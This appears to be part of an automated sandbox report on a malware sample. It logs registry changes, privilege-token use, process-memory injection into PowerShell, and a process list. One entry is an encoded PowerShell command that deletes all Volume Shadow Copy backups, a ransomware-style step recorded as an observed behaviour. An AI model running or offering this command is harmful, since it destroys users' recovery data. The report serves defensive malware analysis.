| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2608 wrote to memory of 1328 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2608 wrote to memory of 1328 | N/A | C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe
"C:\Users\Admin\AppData\Local\Temp\c3669070ec6f303b54314f9301e1294f86afbe22e379773397100d85fc9a4390.exe"
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files
memory/2608-118-0x0000000000710000-0x000000000085A000-memory.dmp
memory/2608-119-0x0000000000710000-0x000000000085A000-memory.dmp
memory/2608-120-0x0000000000710000-0x000000000085A000-memory.dmp
memory/2608-121-0x0000000000A50000-0x0000000000A51000-memory.dmp
memory/2608-122-0x0000000000A60000-0x0000000000A66000-memory.dmp
memory/1328-127-0x00000235B7B60000-0x00000235B7B82000-memory.dmp
memory/1328-131-0x00000235B8660000-0x00000235B86D6000-memory.dmp
memory/1328-143-0x000002359F9A0000-0x00000235B7B60000-memory.dmp
memory/1328-144-0x000002359F9A0000-0x00000235B7B60000-memory.dmp